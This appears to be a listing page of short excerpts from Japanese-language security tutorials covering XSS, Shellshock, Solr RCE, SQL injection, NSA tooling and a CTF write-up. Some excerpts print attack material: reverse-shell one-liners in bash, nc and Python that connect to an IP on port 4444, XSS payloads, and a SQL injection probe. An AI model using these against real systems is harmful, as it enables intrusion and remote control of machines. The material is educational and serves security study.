- 方向:
- 全て ウェブ3.0 バックエンド開発 ウェブフロントエンド データベース 運用・保守 開発ツール PHPフレームワーク 毎日のプログラミング WeChat アプレット よくある問題 他の 技術 CMS チュートリアル Java システムチュートリアル コンピューターのチュートリアル ハードウェアチュートリアル モバイルチュートリアル ソフトウェアチュートリアル モバイル ゲームのチュートリアル
- 分類する:
-
- H3Cポートセキュリティ技術とは何ですか?
- インターネットがますます発達する今日、セキュリティは注意を払わなければならないトピックです。無許可のユーザー ホストが企業ネットワークにランダムに接続するなど、企業内のスイッチ ポートを脅かす動作は数多くあります。たとえば、従業員が自分のラップトップを所有している場合、管理者の同意なしに特定のホストのネットワーク ケーブルを取り外し、持ち込んだラップトップに接続して企業ネットワークに接続することができ、これは大きなセキュリティ リスクをもたらします。機密情報の損失を引き起こす可能性が非常に高くなります。もう 1 つの例は、同意なしにハブやその他のネットワーク機器を設置することです。ネットワーク端末の数を増やすために、従業員が許可なくネットワーク端末の数を増やす場合があります。ハブやスイッチなどのデバイスをオフィスのネットワーク インターフェイスに接続します。この場合、このネットワークインターフェースに対応するスイッチインターフェースのトラフィックが増加します。
- 安全性 1120 2023-05-19 12:46:46
-
- GREに基づくIPSecインスタンスの分析
- IPSecoverGRE
- 安全性 1007 2023-05-19 12:40:06
-
- xss の小規模テストはどのように行われますか?
- セキュリティ制限はありません。alert(/xss/) を使用してください。 制限事項: CSS のみを使用でき、HTML タグは許可されません。式を使用して XSS を構築できることはわかっていますが、テストできるのは IE でのみです。以下のテストはIE6で実行してください。 body{black;xss:alert(/xss/));/*IE6 でテスト済み*/}制限事項: HTML はエスケープされ、Image タグが使用可能です。テストで入力された文字は src アドレスに挿入されるため、擬似プロトコルを使用してそれを回避できます。 「alert(/xss/);」と直接入力するか、イベントを使用してこれを回避できます。次のような最後のステートメントに注意してください: 1"
- 安全性 1010 2023-05-19 11:37:06
-
- bash の脆弱性再発の分析例
- BourneAgainShell (略して BASH) は、GNU/Linux で最も人気のある SHELL 実装です。1980 年に誕生しました。数十年の進化を経て、単純なターミナル コマンド ライン インタプリタから、GNU システムと深く統合された多機能インターフェイスに進化しました。 . . Bash、Unix シェルの一種。最初の正式バージョンは 1989 年にリリースされました。当初は GNU オペレーティング システムで使用することが計画されていましたが、これをデフォルトのシェルとして使用する Linux や MacOSXv10.4 など、ほとんどの Unix 系オペレーティング システムで実行できます。 Microsoft Windows 上の Cygwin および MinGW にも移植されており、MS-Windows 上でも使用できます。
- 安全性 1311 2023-05-19 11:13:11
-
- zabbix がtraceroute データを監視する方法
- 1. Zabbixserver とプロキシは mtrmtr スクリプトをインストールし、zabbixserver とプロキシの次のパスに配置します。 chownzabbix:zabbixmtrtrace.shzabbix を実行して mtrtrace テンプレートを作成します。 5. ホストをテンプレートに関連付け、zabbix のデータを観察します。 ]-[最新データ]:
- 安全性 956 2023-05-19 11:10:12
-
- Apache Solr ベロシティ テンプレート インジェクション RCE 脆弱性の分析例
- 0x01 はじめに Solr は、Web サービスに似た API インターフェイスを提供する独立したエンタープライズ レベルの検索アプリケーション サーバーです。ユーザーは、http リクエストを通じて検索エンジン サーバーに特定の形式の XML ファイルを送信してインデックスを生成できます。また、HttpGet オペレーションを通じて検索リクエストを作成し、XML 形式で返された結果を取得することもできます。 0x02 脆弱性の概要 VelocityResponseWriter コンポーネントは Solr に存在します。攻撃者は、VelocityResponseWriter コンポーネントが指定されたテンプレートのロードを許可するように、関連する構成を変更するための特定のリクエストを作成することができます。これにより、Velocity テンプレート インジェクションのリモート コマンド実行の脆弱性が発生します。攻撃者はこれを悪用します
- 安全性 1021 2023-05-19 10:37:13
-
- JIRA の脆弱性を利用して米軍の非機密インターネット プロトコル ルーター ネットワークにアクセスする例の分析
- 以下では、著者が米国国防総省 (DoD) の Hack the Pentagon 脆弱性公開テスト プロジェクトに参加し、JIRA 脆弱性 CVE-2017-9506 を使用して SSRF 攻撃対象領域を構築し、米軍の非機密インターネットへのアクセスを実現した方法について説明します。 Protocol Router Network (NIPRnet)、および他の脆弱性技術と組み合わせることで、国防総省イントラネット システムの一連の機密情報が取得されました。テストのプロセスと内容は機密事項であるため、この記事ではこの点についてのみ触れ、技術的な詳細や詳細なシナリオについてはあまり公開せず、学習と共有のみを目的としていますので、読者の皆様にはご容赦いただければ幸いです。 JIRA は、オーストラリアの Atlassian 社が開発した優れた問題追跡および管理ソフトウェア ツールで、さまざまな種類の問題を追跡および管理できます。
- 安全性 1084 2023-05-18 22:29:09
-
- SQLインジェクションにはどのような種類がありますか?
- はじめに SQL インジェクション攻撃手法は、データベースから返されたコンテンツを処理するアプリケーションに基づいて、明示的インジェクション、エラー インジェクション、ブラインド インジェクションに分類できます。明示的インジェクション攻撃者は、現在のインターフェイスのコンテンツから必要なコンテンツを直接取得できます。エラー挿入データベース クエリによって返された結果はページには表示されませんが、アプリケーションはデータベース エラー情報をページに出力するため、攻撃者はデータベース エラー ステートメントを作成し、エラー情報から目的のコンテンツを取得できます。ブラインド インジェクション データベース クエリの結果は、直感的なページからは取得できず、攻撃者はデータベース ロジックを使用するか、データベース ライブラリの実行を遅延させることで、目的のコンテンツを取得します。 MySQL 手動インジェクション複合インジェクション?id=1'orderby4--
- 安全性 2110 2023-05-18 22:05:12
-
- リバウンドシェルとは何ですか?
- 1.bash リバウンド bash-i>&/dev/tcp/ip_address/port0>&12.nc リバウンド nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
- 安全性 2119 2023-05-18 22:01:04
-
- NSAの新しいAPTフレームワークDarkPulsarの使い方
- 序文 2017 年 3 月、ShadowBrokers は、DanderSpritz と FuzzBunch という 2 つのフレームワークを含む機密文書を公開し、世界に衝撃を与えました。 DanderSpritz は完全にプラグインで構成されており、情報を収集し、脆弱性を悪用し、乗っ取られたデバイスを操作するために使用されます。これは Java で書かれており、ボットネット管理パネルに似たグラフィカル インターフェイスと、Metasploit ツールに似たコントロール パネルを提供します。また、FuzzBunch によって制御されていないデバイス用のバックドアとプラグインも組み込まれています。 DanderSprit インターフェイスの概要 Fuzzbunch は、さまざまなタイプのプラグインを含む、さまざまなユーティリティが相互作用して連携するためのフレームワークを提供します。
- 安全性 1314 2023-05-18 20:14:58
-
- Ghostscript SAFER サンドボックス バイパスの脆弱性を分析する方法
- はじめに Ghostscript は、Adobe PostScript 言語のインタープリタ ソフトウェアです。 PostScript 言語で描画でき、PS と PDF 間の変換をサポートします。現在、Ghostscript はほとんどの Linux ディストリビューションにデフォルトでインストールされており、Unix、MacOS、Windows、その他のプラットフォームに移植されており、ImagineMagic、PythonPIL、さまざまな PDF リーダーなどのプログラムでも使用されています。脆弱性の説明 8 月 21 日、Google のセキュリティ研究者である Tavis Ormandy 氏は、複数の GhostScript の脆弱性を公開しました。
- 安全性 1468 2023-05-18 19:10:39
-
- DDCTF2019两个逆向分别是什么
- 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
- 安全性 1462 2023-05-18 17:13:20
-
- 制限を回避して Google の内部管理システムにアクセスした例の分析
- ある日、Google の脆弱性を調べていたところ、公開されている脆弱性から Google 独自のサービスの IP アドレスをいくつか発見しましたが、最初はこれらの IP アドレスで何ができるのか全く分かりませんでした。まずこれらの IP アドレスを確認したところ、Google の内部 IP の一部が含まれていることがさらにわかりました。最近、友人の KLSREERAM が Google の内部 IP に関連する脆弱性を報告し、別の友人の Vishnu が Google のサブドメインを使用してコントロール パネルにアクセスする脆弱性を報告したことを突然思い出しました。現在、両方の脆弱性は Google によって修正されており、これら 2 つの脆弱性に関連する内部 IP アドレスにはインターネットからアクセスできません。しかし今、目の前にいくつかの内部 Google IP アドレスがあるので、それができるかどうかを確認する方法を見つけなければなりません。
- 安全性 1109 2023-05-18 15:19:49
-
- Disk Pulse Enterprise Windowアプリケーションの脆弱性解析の実施方法
- 1. 脆弱性の概要 DiskPulseEnterprise はディスクの変更を監視するソフトウェアであり、管理ポート 9120 または Web 管理ウィンドウ 80 を介してソフトウェアに接続して管理し、ディスクの変更を監視できます。 DiskPulse Enterprise にはダイナミック リンク ライブラリ libspp.dll があり、これには HTTP 操作を担当するいくつかの関数が含まれています。この問題はこのダイナミック リンク ライブラリで発生します。ポスト データを処理する際、ポスト データの長さは厳密に制御されていないため、取得したデータを実行すると、無効なメモリにデータをコピーしてバッファオーバーフローを引き起こし、SEHの異常動作処理を引き起こし、最終的にはEIPを制御して任意のコードを実行させます。ソフトウェアのダウンロードリンク:h
- 安全性 1106 2023-05-18 15:04:07
-
- APP クラッシュの主な原因は何ですか?
- 1. どのようなシナリオがクラッシュ問題を引き起こす可能性がありますか? 最近、私はどのような問題がクラッシュを引き起こす可能性があるのか、つまり異常な思考を持っているのかについて考えています。 「ちょうど 2 日前。『ポリス』で、主人公のジョン・ノーランが逃走者の車をパトカーで止めるのに失敗し、逃走者が逃走するシーンがあります。このシーンとテストとの関係は何ですか?」まず第一に、普通の人は道路を運転するときに他人との衝突を避けます。これは機能をテストする主要なプロセスのようなもので、ランダムな入力は行いませんが、警察官は違います。彼は捕まえるために必要なことは何でもします。すべての方法、これはテストプロセス中に機能を使いにくくするためにどのように操作するかを考える異常な思考のようなものです。ガイド1. 異常動作 各種異常動作
- 安全性 2485 2023-05-18 13:55:06